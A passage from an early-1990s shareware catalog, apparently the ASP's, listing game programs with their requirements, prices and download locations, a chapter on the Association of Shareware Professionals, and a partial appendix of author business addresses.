words and clues. Insert words + manually or automatically into the grid. Auto-search can + quickly create over 200 different word arrangements to find the + puzzle with the most words. These puzzles have been used for + business newsletters and seminars, as restaurant place mats, as + vocabulary drills by teachers, and for entertainment at + parties, reunions, etc. Puzzles can also be saved as PCX + graphics or ASCII files for import into Word Perfect and + desktop publishers. + + Chapter 17, "Games" 383 + + + + Product: EGAWHEEL [***] + Needs: IBM PC, DOS 2.0 or better. EGA monitor. + Author: WHEEL Games + Registration: $10.00 + Version: V.17.0S (01-01-92) + User benefits: 90 days support, 12,000 puzzle database. + Look for: availability unknown on BBSs; EGAWHE.ZIP in IBMNEW + forum LIB 8 on CompuServe. + Download size: 96k + Description: + A "Wheel of Fortune"/hangman type of word guessing game for IBM + compatible computers with EGA video card and monitor. The game + features: a colorful spinning wheel, 1-3 players, 5 rounds of + play, a sound on/off option, automatic win after all letters of + the puzzle are bought and guessed, a high score table for the + top ten WHEELERS, and an editor to add/delete/modify puzzles. + The editor may be used to create a custom database for a + teaching aid from grade school through college. + + Product: Fictionary [***] + Needs: IBM PC, DOS 2.1 or better. + Author: Cascoly Software, 206-523-6135 + Registration: $20.00 + Version: 1.32 (04-30-90) + User benefits: Phone/CIS support. + Look for: availability unknown on BBSs; FICT.ZIP in IBMNEW forum + LIB 8 on CompuServe. + Download size: 70k + Description: + The game of fantastic and farfetched definitions. Each round a + player chooses a word. You can choose your own word or pick one + from the large selection included with the game. Each other + player makes up their own definition for the word. Everyone + votes for the word they think is correct and points are scored + for guessing the proper one, or misleading other players. Great + vocabulary builder. Can be played by 1-6. + + Product: Hangman for Students + Needs: IBM PC, DOS 2.0 or better. + Author: Langin Software, 618-532-4899 + Registration: $19.00 + Version: 1.01 (03-09-91) + User benefits: CompuServe/mail support. + Look for: availability unknown on BBSs; HANG.ZIP in IBMNEW forum + LIB 6 on CompuServe. + Download size: 181k + Description: + The classic hangman game with word lists divided by grade + levels, from Grade 1 to Grade 5, plus junior high and senior + high. It offers enough chances so that kids can win frequently + and stay interested in the game. Adults may be surprised that + they like to play, too. Parents can create additional word + lists. Over 4,500 words. + + Chapter 17, "Games" 384 + + + + Product: NAMEGRAM + Needs: IBM PC, DOS 2.0 or better. 256k RAM. + Author: Neil J. Rubenking + Registration: $25.00 + Version: 3.0 (06-12-89) + User benefits: 100,000-word dictionary, utility to add/remove + words (up to 32 letters) in the dictionary. + Look for: availability unknown on BBSs; NAMEGM.ARC in + ZNT:UTILFORUM forum LIB 8 on CompuServe. + Download size: 260k + Description: + Takes any name or phrase and makes anagrams of it using a + 90,000 word dictionary of words up to 11 letters. E.g. "TURBO + PASCAL" becomes "LABORS AT CPU"; "COLONEL OLIVER NORTH" becomes + "I CONTROL HONOR LEVEL". Menu-driven, supports mouse, works + with text screen sizes from 80x25 to 132x43 or more. Option to + pre-select words for anagrams OR let the computer do it all. + Can print list of all words that can be made from input phrase. + Amuse your friends by anagramming their names. + + Product: Poetry Generator [***] + Turn your computer into a poet! See full description on + page 131. + + Product: VGAWHEEL [***] + Needs: IBM PC, DOS 2.0 or better. VGA monitor. + Author: WHEEL Games + Registration: $10.00 + Version: V.1.70S (01-01-92) + User benefits: 90 days support, 12,000 puzzle database. + Look for: availability unknown on BBSs; VGAWHE.ZIP in IBMNEW + forum LIB 8 on CompuServe. + Download size: 95k + Description: + A "Wheel of Fortune"/Hangman type of word guessing game. The + game features: a colorful spinning wheel, 1-3 players, 5 rounds + of play, a sound on/off option, automatic win after all letters + have been bought and guessed, a high score table for the top + ten WHEELERS, and an editor to add/delete/modify puzzles. The + editor may be used to create a custom database for using the + program as a teaching aid in grade school through college. + + Chapter 17, "Games" 385 + + + + Product: WINWHEEL [***] + Needs: IBM PC, Windows 3.0 or better. (Does not run in Windows + 3.0 "real" mode.) VGA monitor, mouse, VBRUN100.DLL run-time + module for Visual Basic applications. + Author: WHEEL Games + Registration: $19.00 + Version: 1.40 (03-15-92) + User benefits: Database of over 12,000 puzzles. + Look for: availability unknown on BBSs; WINWHE.ZIP in WINADV + forum LIB 6 on CompuServe. + Download size: 146k + Description: + A Wheel of Fortune/Hangman type word guessing game for Windows + 3.X. Features: colorful graphics, 1-3 players, 5 rounds, sound + on/off toggle, autowin after all letters bought and guessed, + hi-score table for top 10 WHEELERS, and a puzzle editor to add/ + delete/modify puzzles. + + Product: WORDSEARCH POWER + Needs: IBM PC, DOS 2.1 or better. 320k RAM, any printer with IBM + high-ASCII character set. + Author: WISCO Computing, 715-423-8189 + Registration: $31.95 + Version: 1.00 (01-02-92) + User benefits: Latest version, telephone and BBS support, + additional word lists. + Look for: VOCBINGO.ZIP on BBSs (call 715-435-3855 to download it + at no charge). + Download size: 109k + Description: + Create word searches, vocabulary bingo cards, and flash cards + from your words and definitions. Word lists are 100% + compatible with CROSSWORD POWER. + + 17.14.1 Cryptanalysis + + Product: The Cipher-Ace Series [***] + Needs: IBM PC, DOS 2.0 or better. 256K RAM. + Author: Charles W. Stewart, 407-855-6148 + Registration: $20.00 + Version: 2.0 (02-28-92) + User benefits: Printed manual, six months mail/email support, + shareware disks of other programs. + Look for: CIFA20.ZIP on BBSs; CIFA20.ZIP in IBMNEW forum LIB 6 on + CompuServe. + Download size: 200k + Description: + Introduces the user to subject of Cryptography. Provides work + screen and help menus for de-crypting two cipher types, with + sample ciphers. Enter and save messages. Encrypt own messages + for sending. Text files of associations and publications. + Catalog in files. + + Chapter 17, "Games" 386 + + + + 17.15 Pinball/paddleball + + Product: TiltMaze + Try to roll the smiley balls into the center. See full + description on page 367. + + + 17.16 Strategy/simulation + + Product: AntiC [***] + Needs: IBM PC, DOS 3.0 or better. EGA monitor; MS compatible + mouse. + Author: Cascoly Software, 206-523-6135 + Registration: $20.00 + Version: 1.11 (02-02-92) + User benefits: Phone/CompuServe support, more puzzles. + Look for: availability unknown on BBSs; ANTICX.ZIP in IBMNEW + forum LIB 6 (multiple files) on CompuServe. + Download size: 80k + Description: + A cross between Othello and Life. Each square sends its color + to the neighboring squares in the network. If only one color + comes into a square, it takes that color. If two colors come + in, they cancel and the square assumes the third color. Each + time you change a square, all squares in the pattern are + recalculated and redrawn. change puzzles and display + + Product: ATC: Air Traffic Controller [***] + Needs: IBM PC, DOS 2.1 or better. Hercules or CGA monitor. + Author: Cascoly Software, 206-523-6135 + Registration: $20.00 + Version: 1.0 (09-29-85) + User benefits: Phone/CompuServe support. + Look for: ATC.ZIP on BBSs. + Download size: 60k + Description: + An air traffic controller game that's perfect for a few minutes + or hours of fun. Easy to learn, but difficult to master. The + game tracks best scores at each of 20 levels of difficulty. + Ages 10 and up. + + Product: Border [***] + Needs: IBM PC, DOS 2.1 or better. CGA monitor. + Author: Cascoly Software, 206-523-6135 + Registration: $20.00 + Version: 1.1 (02-23-89) + User benefits: Phone/CompuServe support. + Look for: BORDER.ZIP on BBSs. + Download size: 70k + Description: + A combination of GO and connect the dots, this abstract + strategy game for 2 players involves enclosing more area than + your opponent, while preventing them from stopping you. Ages 12 + and up. + + Chapter 17, "Games" 387 + + + + Product: Circle Link + Needs: IBM PC, DOS 3.0 or better. EGA monitor. + Author: ShareGames, 619-283-0472 + Registration: $10.00 + Version: 1.1 (06-12-90) + User benefits: Latest Version, Free updates for 6 Months, & 24 Hr + Tech Support. + Look for: CIRCLINK.ZIP on BBSs (call 619-440-0899 to download it + at no charge). + Download size: 61k + Description: + To win, you must get your marbles to the bottom of the linked + circles first. You select a row or column of links by pressing + a number or alphabet key. That row or column will change its + color and rotate at random one quarter turn left or right. If + a circle's opening matches the link next to it, the marble will + move left, right, or down. If a link is already occupied, the + opponent's will have to start at the top again. Up to four + players, including the computer, can play. + + Product: Ecomaster [***] + Needs: IBM PC, DOS 2.1 or better. CGA monitor. + Author: Cascoly Software, 206-523-6135 + Registration: $20.00 + Version: 1.1 (11-15-90) + User benefits: Phone/CompuServe support. + Look for: availability unknown on BBSs; ECO.ZIP in IBMNEW forum + LIB 6 on CompuServe. + Download size: 60k + Description: + A diverting ecology game for one or more players in which you + bid for and trade animals based on their abilities to thrive in + different environments. No previous biological experience is + assumed. Mildly educational without belaboring the point. For + 1 or more players. Typical games last less than an hour. For + ages 10 and up. + + Product: First Expedition + Sea-going adventure with plotting by stars. See full + description on page 378. + + Product: GREEN [***] + Author: Cascoly Software, 206-523-6135 + Registration: $25.00 + Version: 1.02 (03-30-92) + User benefits: Phone/CompuServe support. + Look for: availability unknown on BBSs; GREENX.ZIP in IBMNEW + forum LIB 6 on CompuServe. + Download size: 140k + Description: + Help the planters as they work to prevent the pavers from + turning farms into parking lots. Pavers include mall + developers, real estate agents, clear-cut loggers and other + exploiters. There are several different maps, of varying + + Chapter 17, "Games" 388 + + + + difficulty. You have the ability to plant hedges, add walls, + and to destroy pavement. Unique, yet similar in concept to + Populous and SimCity. + + Product: Nine Men's Morris + Needs: IBM PC, DOS 2.0 or better. + Author: Langin Software, 618-532-4899 + Registration: $10.00 + Version: 1.03 (05-31-91) + User benefits: CompuServe/mail support. + Look for: availability unknown on BBSs; NINE.ZIP in IBMNEW forum + LIB 6 on CompuServe. + Download size: 114k + Description: + An ancient strategy game also called "The Mill." Get "three in + a row" to take your opponent's pieces. Is somewhat like tic- + tac-toe, but expanded. Looks easy, but isn't. Play against + the computer. Switch sides. Take back moves. Hypertext help + system. Supports mouse. Warning: You may get hooked. + + Product: Tear Down the Wall + Needs: IBM PC, DOS 2.0 or better. + Author: Langin Software, 618-532-4899 + Registration: $10.00 + Version: 1.02 (05-06-91) + User benefits: CompuServe/mail support. + Look for: availability unknown on BBSs; WALL.ZIP in IBMNEW forum + LIB 6 on CompuServe. + Download size: 109k + Description: + Tear down the wall without using a pick or going to Berlin. + Great strategy game. Supports a mouse. The winner is the one + who destroys the biggest and most bricks. Each wall is + different, and hard and weak bricks effect how the wall falls. + Think ahead: A good move by you may leave a better move for + the computer. Hypertext help system. Don't think you can beat + the computer! + + Product: WEBS [***] + Needs: IBM PC, DOS 3.0 or better. Mouse; EGA monitor. + Author: Cascoly Software, 206-523-6135 + Registration: $20.00 + Version: 1.16 (02-27-92) + User benefits: Phone/CompuServe support. + Look for: availability unknown on BBSs; WEBS.ZIP in IBMNEW forum + LIB 6 on CompuServe. + Download size: 70k + Description: + A deceptively simple solitaire game requiring both strategy and + cunning. You claim nodes on a web while trying to limit the + moves available to your opponent. Automatic display of + potential moves, a variety of webs and difficulties give hours + of challenge. + + Chapter 17, "Games" 389 + + + + 17.17 Puzzles, mix & match + + Product: DressMeUp + Needs: IBM PC, DOS 3.0 or better. EGA monitor. + Author: ShareGames, 619-283-0472 + Registration: $25.00 + Version: 2.2 (11-14-90) + User benefits: Latest Version, Free updates for 6 Months, & 24 Hr + Tech Support. + Look for: DRESSUP.ZIP on BBSs (call 619-440-0899 to download it + at no charge). + Download size: 134k + Description: + An imaginative paper doll game with a cute collection of + animals to dress up. A girl and a boy may be picked from any + of four kinds of stuffed animals on the shelf to play with. + There are blouses, skirts, slacks, hose, purses, jackets, + shoes, hats, coats, shirts, sweaters, pants, and socks hidden + behind the cabinet doors to choose from. Comes with two + complete outfits for the girl and boy animals and eight more + outfits can be added to their wardrobes. + + + 17.18 For adults + + Product: Get Lucky! + Needs: IBM PC, DOS 2.0 or better. CGA monitor. + Author: Glencoe Computing, 314-458-2863 (EVE) + Registration: $24.99 + Version: 2.25 (06-05-89) + User benefits: Latest version, additional trivia questions. + Look for: GL-225.EXE on BBSs; GL-225.EXE in IBMNEW forum LIB 8 on + CompuServe. + Download size: 118k + Description: + A multi-faceted adult oriented game package which featurs five + variations of Trivia and Poker, 2 of which are played in "adult + party" mode with an intimate friend (or one you would like to + be more intimate with). Also included are one & two player + Trivia and "The Poker Machine" which simulates the poker + gambling machines found in many casinos. + + + 17.19 Software tools + + 17.19.1 For other + + Product: ZZT Arcade-Adventure Game + Lots of arcade action & puzzle solving. See full description + on page 368. + + Chapter 17, "Games" 390 + + + + 17.20 Other + + Product: Fantasy + Needs: IBM PC, DOS 2.0 or better. CGA monitor. + Author: Natural Software, 708-377-7320 + Registration: $20.00 + Version: 2.0 (09-01-90) + User benefits: Phone support. + Look for: FANTASY.ZIP on BBSs (call 312-276-4159 to download it + at no charge); FANT.ZIP in IBMNEW forum LIB 5 on CompuServe. + Download size: 100k + Description: + Create flowing graphic images as you move your mouse. If art + can be fleeting, transitory and personal - then Fantasy is an + artist's tool. You are the artist and the audience. It's a tool + for personal performance art. Like building sand castles or + blowing bubbles, each performance is different and highly + personal. + + As you move the mouse the image constantly moves and responds + in never-ending, never-repeating animated sequences. + Performances can be recorded and replayed. Demos included. + + Product: Lotto Challenger + Picks numbers to play and generates tickets. See full + description on page 336. + + Product: The LOTTO SIMULATOR + See how your picks stand up against the odds. See full + description on page 336. + + Product: PEG [***] + Needs: IBM PC, DOS 2.1 or better. Mouse; EGA monitor. + Author: Cascoly Software, 206-523-6135 + Registration: $20.00 + Version: 1.03 (02-10-92) + User benefits: Phone/CompuServe support. + Look for: availability unknown on BBSs; PEG.ZIP in IBMNEW forum + LIB 6 on CompuServe. + Download size: 80k + Description: + No one really knows when PEG solitaire was invented. Some + stories trace it to prisoners during the French Revolution, but + published descriptions date at least 100 years earlier. Most + likely the game is even older. PEG presents variations on the + classic peg solitaire with multiple starting positions, and + varying endgames. One of the pleasures of playing the game on + your computer is that you can quickly set up the board to try + different strategies. Ages 8 to 88. + + Product: The Pool Manager + Football Pool Organizer/Database (all sports). See full + description on page 340. + + Chapter 17, "Games" 391 + + + + Product: World Name Game + Graphic Geography Game. See full description on page 283. + + Chapter 18, "About shareware" 392 + + + + + + Chapter 18 + About shareware + + + 18.1 Assn. Shareware Professionals + + The Association of Shareware Professionals (ASP) formed in 1987 + to strengthen the future of shareware as an alternative to + traditional (retail) software marketing. It also serves as an + information clearing house for its members and the public at + large. ASP members subscribe to a code of ethics and are + committed to the shareware concept. + + The ASP demands professionalism from its members. Authors must + acknowledge every registration (you get more than just a + canceled check) and they must provide at least three months of + support for their products. ASP members must also live up to + any other benefits they offer. + + You can turn to an ombudsman for help if you can't resolve a + problem with an ASP author or disk vendor. Members must + explain this in every shareware program & disk vendor catalog. + + Few people need the ombudsman's help. ASP members represent + the cream of the crop in the shareware industry, but it's nice + to know you can turn to someone if you think you got a raw + deal. Unfortunately, it happens -- authors have been kicked + out because of repeated complaints. + + The Association monitors Congress for potentially damaging + legislation and has sent spokesmen to testify before + congressional subcommittees. It has also taken on the respon- + sibility of safeguarding the term 'shareware' itself. ASP has + filed motions in countries as far away as England and South + Africa to stop people who attempt to claim it as a trademark + word. + + ASP members 'meet' online in a public forum of the CompuServe + network (GO SHAREWARE). Members send & receive messages, + transmit files, and exchange valuable information. Old hands + in the shareware business pass along their insights to new + members. The group holds public and private debates and + members vote on major issues by sending private messages to the + Association secretary. + + The ASP holds yearly 'face to face' meetings and appears at + various trade shows around the country (including COMDEX and + PC-EXPO). It also provides speakers who lecture on every + aspect of shareware. You can learn more by writing to the + Association of Shareware Professionals, 545 Grover Road, + Muskegon, MI 49442. If you have a modem and a CompuServe + + Chapter 18, "About shareware" 393 + + + + account, you can log on and go to the SHAREWARE forum for more + information. + + + Product: Approved Vendor Requirements + Author: Association of Shareware Professionals, 616-788-5131 + Version: n/a (07-01-91) + Look for: availability unknown on BBSs; VENDOR.ARC in SHAREWARE + forum LIB 2 on CompuServe. + Download size: 4k + Description: + Contains all requirements ASP Approved Vendors must follow. + Potential shareware authors may want to review this file to see + what the ASP uses as its factors for approving disk vendors to + become associate members in the organization. + + Product: ASP BBS Membership Application + Author: Association of Shareware Professionals, 616-788-5131 + Version: n/a (02-15-91) + Look for: availability unknown on BBSs (call 317-856-2087 to + download it at no charge); BBSAPP.ZIP in SHAREWARE forum LIB 2 + on CompuServe. + Download size: 25k + Description: + Everything a BBS Sysop needs to join the ASP. Rules, + application form, text files to post on the BBS, etc. All are + text files. + + The ASP BBS Membership ensures callers that the BBS adheres to + certain standards of quality and shareware support. Cost of + membership is $40 / year. + + Product: ASP Catalog for BBSs + Author: Association of Shareware Professionals, 616-788-5131 + Look for: ASP####.ZIP on BBSs (call 317-856-2087 to download it + at no charge). + Download size: 300k + Description: + An official catalog of shareware products published by members + of the Assocation of Shareware Professionals and available on + computer bulletin board systems (BBSs). Computer users can + download these products and use them on a "try before you buy" + basis. This catalog describes each product and in many cases + identifies a BBS where you can download it for evaluation + purposes at no charge. Products grouped by subject and cross- + referenced to authors' addresses via a comprehensive index. + Editor's note: '####' represents a four-digit number which + increases with each new edition of the catalog. + + Chapter 18, "About shareware" 394 + + + + Product: ASP Catalog for CompuServe + Author: Association of Shareware Professionals, 616-788-5131 + Look for: CIS####.ZIP on BBSs (call 317-856-2087 to download it + at no charge); CATLOG.ZIP in SHAREWARE forum LIB 2 on + CompuServe. + Download size: 235k + Description: + An official catalog of shareware products published by members + of the Association of Shareware Professionals and available on + CompuServe. Computer users can download these products and use + them on a "try before you buy" basis. This catalog describes + each product and gives its location on CompuServe. Products + grouped by subject and cross-referenced to authors' addresses + via a comprehensive index. + Editor's note: '####' represents a four-digit number which + increases with each new edition of the catalog. + + Product: ASP Catalog for GEnie + Author: Association of Shareware Professionals, 616-788-5131 + Look for: GEN####.ZIP on BBSs (call 317-856-2087 to download it + at no charge). + Download size: 100k + Description: + An official catalog of shareware products published by members + of the Assocation of Shareware Professionals and available on + GEnie. Computer users can download these products and use them + on a "try before you buy" basis. This catalog describes each + product and gives its "RoundTable" location on GEnie. Products + grouped by subject and cross-referenced to authors' addresses + via a comprehensive index. + Editor's note: '####' represents a four-digit number which + increases with each new edition of the catalog. + + Product: ASP List of Approved BBSs + Author: Association of Shareware Professionals, 616-788-5131 + Version: n/a (07-01-91) + Look for: availability unknown on BBSs; APPBBS.ZIP in SHAREWARE + forum LIB 2 on CompuServe. + Download size: 30k + Description: + A complete list of ASP Approved BBSs. Gives the name, address, + phone number, conferences, lines, protocols, network + affiliations, etc. Formatted for use as a mailing list or for + browsing. Updated monthly. ASP recommends Approved BBSs. + Editor's note: Appendix C of this catalog contains much of the + same information. + + Chapter 18, "About shareware" 395 + + + + Product: ASP List of Approved Vendors + Author: Association of Shareware Professionals, 616-788-5131 + Version: n/a (07-01-91) + Look for: availability unknown on BBSs; VENDOR.EXE in SHAREWARE + forum LIB 2 on CompuServe. + Download size: 20k + Description: + Complete list of ASP Approved Vendors by country and state or + province. Use this catalog to find the ASP Approved Vendor + nearest you. ASP recommends ASP Approved Vendors as one of the + best sources of high quality, up-to-date shareware programs. + Updated monthly. + Editor's note: Appendix B of this catalog contains much of the + same information. + + Product: How to join as a "beta" author + Author: Association of Shareware Professionals, 616-788-5131 + Version: n/a (11-27-89) + Look for: availability unknown on BBSs; BETA.TXT in SHAREWARE + forum LIB 2 on CompuServe. + Download size: 3k + Description: + A compilation of messages explaining how potential shareware + authors can apply for membership in the ASP before releasing + their first shareware program. + + Product: IBM PC Author Application + Author: Association of Shareware Professionals, 616-788-5131 + Version: n/a (07-01-91) + Look for: APPLIC.ZIP on BBSs (call 317-856-2087 to download it at + no charge); APPLIC.EXE in SHAREWARE forum LIB 2 on CompuServe. + Download size: 35k + Description: + Information on joining the Association of Shareware + Professionals as an author member. This self-extract file + contains several necessary information files and many reasons + why you would wish to join the ASP. Specific to PC/MS-DOS + authors -- see other files in this section if you program on a + different platform (Amiga or MacIntosh for example). + + Product: Information about copyrights + Author: Association of Shareware Professionals, 616-788-5131 + Version: n/a (04-29-90) + Look for: availability unknown on BBSs; COPYRT.ARC in SHAREWARE + forum LIB 4 on CompuServe. + Download size: 3k + Description: + A compilation of messages on why & how you should copyright a + shareware program. + + Chapter 18, "About shareware" 396 + + + + Product: MacIntosh Author Application + Author: Association of Shareware Professionals, 616-788-5131 + Version: n/a (07-01-91) + Look for: availability unknown on BBSs (call 317-856-2087 to + download it at no charge); APPLIC.SIT in SHAREWARE forum LIB 2 + on CompuServe. + Download size: 40k + Description: + Information on joining the Association of Shareware + Professionals as an author member. This self-extract file + contains several necessary information files and many reasons + why you would wish to join the ASP. Specific to MacIntosh + authors -- see other files in this section if you program on a + different platform (Amiga or IBM PC for example). + + + 18.2 Other + + Product: CompUser + Needs: IBM PC, DOS 2.1 or better. Hard disk, IBM Graphics + printer. + Author: Unicorn Software Limited, 219-563-HOME + Registration: $30.00 + Version: 2.70a (06-21-91) + User benefits: Master disks, phone/BBS/mail support, one year of + free quarterly updates. Shareware disks of other programs. + Look for: CUSER*.ZIP (multiple files) on BBSs (call 317-784-2147 + to download it at no charge); CUSE*.ZIP in IBMAPP forum LIB 7 + (multiple files) on CompuServe. + Download size: 380k + Description: + A rated cyclopedia of the Shareware community. The data file is + a listing of dealers in shareware, BBSs, authors of Shareware, + magazines and newsletters (Over 3000!). The information is + rated and complete. The list is updated daily and distributed 4 + times a year. The program lets you maintain and work with the + data file, create and edit post cards for mailings to persons + in the data file. Then you may retrieve either listings of the + addresses, address labels, 4X6 cards, or Rolodex cards. + + Chapter 19, "Other" 397 + + + + + + Chapter 19 + Other + + + 19.1 Software tools + + 19.1.1 For multiple programs + + Product: BootMaster [***] + Boot Configuration Manager. See full description on page 70. + + 19.1.2 For other + + Product: PBMouse + Mice with many text and graphic cursors. See full description + on page 261. + + Product: STAFF-DEVELOPER + Free RunTime Licence for Database Engines. See full + description on page 397. + + + 19.2 Other + + Product: Simply Labels + Needs: IBM PC, DOS 2.1 or better. 256k RAM. + Author: SimpleWare, 709-489-3757 + Registration: $25.00 + Version: IIIa (07-01-91) + User benefits: Latest version with shareware notices removed. + Support by mail. + Look for: SIMLAB3A.ZIP on BBSs (call 709-489-6018 to download it + at no charge). + Download size: 270k + Description: + Design free form labels. Many features including a full label + editor with Qwik keys. Printing options include multiple + copies, multiple labels across, auto centering, envelope or + report formats and many others. + + Other features include sorting on any part of a label, many + types of searches, import text, read dBase III files, custom + colors, Date and Time stamps, non-printing lines, DOS shell, 70 + page manual and many more. Applications include mailing + labels, disk labels, cassette jackets... + + Chapter 19, "Other" 398 + + + + Product: STAFF-DEVELOPER + Needs: IBM PC, DOS 3.0 or better. 640k RAM, hard disk. + Extended/expanded memory recommended. + Author: MSC - Morariu Software Consulting, 0049-6196-48524 + Registration: $399.00 + Version: 1.0 (06-01-91) + User benefits: Free distribution licence of the RunTime Module. + The name of the data base developer will be shown in the + RunTime software at visible place. + Look for: availability unknown on BBSs. + Download size: 560k + Special instructions: Product distribution restricted to the + United States. + Description: + This is for the developer of database applications who want to + bundle one of the STAFF-FAMILY members with his data. The + software is delivered with the license for the unlimited + distribution of the respective RunTime version as part of the + specific application. The free distribution license for the + RunTime version of each STAFF module costs US$ 399.00. This is + advantageous for data vendors and for organizations in which + large amounts of the same data are used on many PC's. + + Appendix A, "Author addresses" 399 + + + + + + Appendix A + Author addresses + + This appendix cross-references each author to his or her pro- + duct(s). If you want to know where to write or call about a + particular product, look for it in the index and write down the + page number where the product name appears in this appendix. + Then turn to the appropriate page in this appendix and look up + the author. + + + Product: Approved Vendor Requirements, ASP BBS Membership + Application, ASP Catalog for BBSs, ASP Catalog for CompuServe, + ASP Catalog for GEnie, ASP List of Approved BBSs, ASP List of + Approved Vendors, How to join as a "beta" author, IBM PC Author + Application, Information about copyrights, MacIntosh Author + Application + Association of Shareware Professionals + Address: 545 Grover Rd., Muskegon MI 49442 + Fax: 616-788-2765 + Queries: 616-788-5131 + + Product: PCFDial, Qanalyst + Barn Owl Software + Address: P.O. Box 74, O'Fallon, IL 62269 + Orders: 800-788-0787 + Fax: 618-632-0023 + Queries: 618-632-7345 + + Product: PrintPlus + Lambert Klein + Address: PO Box 611 Wayne MI 48184 + Orders: 800-622-2793 + Fax: 708-397-0381 + Queries: 708-397-1221 + + Product: FLEXIBAK Plus + Nildram Software + Address: 26 Stanley Hill Avenue, Amersham, Bucks HP7 9BD + UNITED KINGDOM + Orders: 708-397-1221 + Fax: 708-397-0381 + Queries: 708-397-1221 + + Product: 4Shell for Windows, dbDIAL(tm), GRAB Plus(r), GRAB + Plus(r) for Windows, ZPAY 3 + ZPAY Payroll Systems, Inc. (Paul Mayer) + th + Address: 2526 69 Avenue South, St. Petersburg, FL 33712-5631 + Orders: 800-468-4188 + Fax: 813-866-8034 + Queries: 813-866-8233 + + Appendix A, "Author addresses" 400 + + + + Product: Disk DUP, FormGen, FormGen Business Collection, FormGen + Fill, FormGen Home Collection, FormGen Utility Pak #1 + FormGen Corp. + Address: 13 Holland Drive, Bolton, ON, Canada L7E 1G4 + Orders: 416-857-4141 + Fax: 416-857-4531 + Queries: 416-857-4141 + + Product: PCCLOCK + Michael J. Sadaway + Address: Box 128-P, South Walpole, MA 02071 + + Product: Personal Calendar (PC) for DOS + FunStuff Software (Paul Munoz-Colman) + Address: 11645 Charter Oak Ct., Suite 201, Reston, VA + 22090-4526 + Orders: 800-242-4775 + Fax: 703-435-3130 + Queries: 703-435-1110 + + Product: Disk Manager (CUDM), Duplicate File Manager + Micro System Solutions + Address: 5048 W Maplewood Ave, Littleton CO 80123 + Orders: 800-421-1789 + Queries: 303-795-7653 + + Product: ProDev*EPRICE, ProDev*MEMBER, ProDev*QUOTE, ProDev*QUOTE + Utility Programs + Pro Dev Software + Address: 545 Grover Road, Muskegon MI 49442-9427 USA + Orders: 616-788-2243 + Queries: 616-788-2243 + + Product: CATALOG-ON-A-DISK, DARN! Don't Forget!, Programmer's + SUPER-MAINT + EmmaSoft + Address: PO Box 238 Lansing, NY 14882-0238 + Orders: 607-533-4685 + Fax: 607-533-4685 + Queries: 607-533-4685 + + Product: BOXER(tm) Text Editing System + BOXER Software + Address: P.O. Box 3230, Peterborough, NH 03458-3230 + Orders: 800-982-6937 + Queries: 603-924-6602 + + Appendix A, "Author addresses" 401 + + + + Product: Attribution, Backup, Backup/2, Changer/2, Director, + Dupes, Except, Getkey/2, Globally, Globally/2, Launcher, Maker, + Mover, Renamer, Renamer/2, Room, Shredder/2, Stamper, + Stringer/2 + Richard W. Adams + Address: 104 Willow Oaks Boulevard, Hampton, VA 23669-1528 + Orders: 804-851-5263 + + Product: TechnoJock's Object Toolkit, TechnoJock's Turbo Toolkit + TechnoJock Software, Inc. + Address: PO Box 820927, Houston TX 77282 + Orders: 800-242 4775 + Fax: 713-493 5872 + Queries: 713-493 6354 + + Product: Fantasy, GEMCAP, PC-Draft II, PC-Draft-CAD + Natural Software + Address: 19 South Fifth Street, St. Charles, IL 60174 + Orders: 708-377-7320 + Queries: 708-377-7320 + + Product: Cipher, Cipher for Windows, EGATrek, Mah + Jongg--Solitaire, MouseTools, Shooting Gallery, SuperFly + Arcanum Computing + Address: 92 Bishop Drive, Framingham, MA 01701-6515 + + Product: Plot-Line + PlotSoft Solutions + Address: RR#4 Shelburne Ontario Canada L0N 1S8 + Orders: 519-925-5468 + Fax: 519-942-3241 + Queries: 519-925-5468 + + Product: ALPS, ALPS(PC), Architectural Engineering, Complement & + Schedules, Complement & Schedules(PC), Custodial Requirements, + Custodial Requirements(PC), Decision Analysis, Decision + Analysis(PC), EE, Flow Process, Flow Process(PC), Furniture & + Equipment Survey, Furniture, Equipment Survey(PC), Graphical + Representation, Graphical Representation(PC), Layout Planning, + Layout Planning(PC), Man/machine Process, Man/Machine + Process(PC), Methods Time Measurement, Methods Time + Merasurement(PC), Operation Process, Operation Process(PC), + Operator Process, Operator Process(PC), Overhead Cost, Overhead + Cost(PC), Space Relationship, Space Relationship(PC), + Statistical, Statistical(PC), Value Engineering, Value + Engineering(PC), Volume,Hours & Productivity(PC), Volume,Hours + & Productivity + ALPS Software + Address: 1821 Elm Ave., Canon City, CO 81212-4524 + Orders: 800-242-4PSL + Fax: 713-524-6398 + Queries: 719-269-1117 + + Appendix A, "Author addresses" 402 + + + + Product: FOURU, Little Black Book, LK4.EXE, LOGGIT + GTX Software + Address: 5419 Dahlia Drive, Los Angeles, CA 90041 + Orders: 213-257-2704 + Queries: 213-257-2704 + + Product: DISKLIST, SHERLOCK + Gulf Sierra + Address: 14809 Clavel Street, Rockville, MD 20853 + Orders: 301-460-0354 + Queries: 301-460-0354 + + Product: Hard Disk Director + Canyon Software + Address: 1537 Fourth Street, suite 131, San Rafael, CA 94901 + Orders: 415-453-9779 + Fax: 415-459-4904 + Queries: 415-453-9779 + + Product: Newkey + FAB Software + Address: P.O. Box 336, Wayland, MA 01778 + Orders: 508-358-6357 + Queries: 508-358-6357 + + Product: Rubicon Publisher + Rubicon Computer Labs Inc. + Address: Box 336, Chelsea, QC, Canada J0X 1N0 + Orders: 819-770-4317 + Fax: 819-770-4317 + Queries: 819-770-4317 + + Product: FASTFILE + Interactive Mini Systems, Inc. + Address: 5312 W Tucannon, Kennewick, WA 99336 + Orders: 509-783-3829 + Queries: 509-783-3829 + + Product: DB2DOC, DB2PRG, QQUERY (All Fox versions), QQUERY + (FoxBASE+ 2.10 version), QQUERY (FoxPro 1.02 version), QQUERY + (FoxPro 2.0 version) + Carlos Berguido + Address: 1722 Capella Court - Petaluma, CA 94954 + Orders: 707-762-9067 + Queries: 707-762-9067 + + Product: ICP + Spirit7 Software, Ltd. + Address: PO Box 777/ Waynesboro, VA 22980 + Orders: 703-943-4635 + Fax: 703-943-4635 + Queries: 703-943-4635 + + Appendix A, "Author addresses" 403 + + + + Product: BOOKLET, BOOKLET-SCREEN, Smart10 + Sympathetic Software + Address: 9531 Telhan Drive, Huntington Beach, CA 92646 + + Product: TAX91 + F. Roland Bjorklund + Address: P.O. Box 1156, Bryans Road, MD 20616 + Queries: 301-645-6819 + + Product: Nifty James' RAM Disk, Nifty James's File Finder, NJ's + File Finder for Windows + Mike Blaszczak + Address: 8 Concorde Way #A2, Windsor Locks, Connecticut + 06096-1546 / USA + Orders: 203-292-1356 + Queries: 203-292-1356 + + Product: VMiX 386 + 